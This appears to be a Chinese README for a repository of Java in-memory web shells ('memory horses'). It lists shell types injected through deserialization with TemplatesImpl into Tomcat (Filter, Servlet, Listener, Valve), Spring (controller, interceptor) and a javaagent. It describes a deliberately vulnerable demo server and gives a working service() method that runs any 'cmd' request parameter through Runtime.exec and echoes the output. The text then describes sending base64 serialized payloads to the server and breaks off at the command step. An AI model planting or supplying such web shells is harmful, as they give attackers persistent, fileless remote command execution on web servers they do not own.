记录总结Java内存马的类型和相关代码示例
JavaMemShell
利用Java反序列化时TemplatesImpl类加载字节码实现的内存马示例
Server-Demo
Spring 5.2.3 和Tomcat8服务端的Demo,接受参数进行反序列化,
tomcat
- Filter型
- Servlet型
- Listener型
- TomcatValue型
spring
- controller型
- Interceptor型
javaagent
- 文件落地,持久化
每种类型shell动态注册的执行逻辑在静态代码块中,由于反序列化需要,实现类需要继承AbstractTranslet
static {
try{
xxx
}catch (Exception e){
e.printStackTrace();
}
}
获取request和response,执行命令并进行回显的逻辑在 doFilter
,requestDestroyed
,service
等方法中,如有需要自行替换,示例:
public void service(ServletRequest servletRequest, ServletResponse servletResponse)
throws ServletException, IOException {
HttpServletRequest request = (HttpServletRequest)servletRequest;
HttpServletResponse response = (HttpServletResponse)servletResponse;
String method = request.getMethod();
if ("GET".equals(method)){
String cmd = request.getParameter("cmd");
if (cmd != null){
Process process = Runtime.getRuntime().exec(cmd);
Scanner s = new Scanner(process.getInputStream()).useDelimiter("\\a");;
String output = s.hasNext() ? s.next() : "";
PrintWriter writer = response.getWriter();
writer.write(output);
writer.flush();
writer.close();
}
}
}
以springInterceptor内存代码为例,将生成序列化的base64代码发送到服务端
执行命令: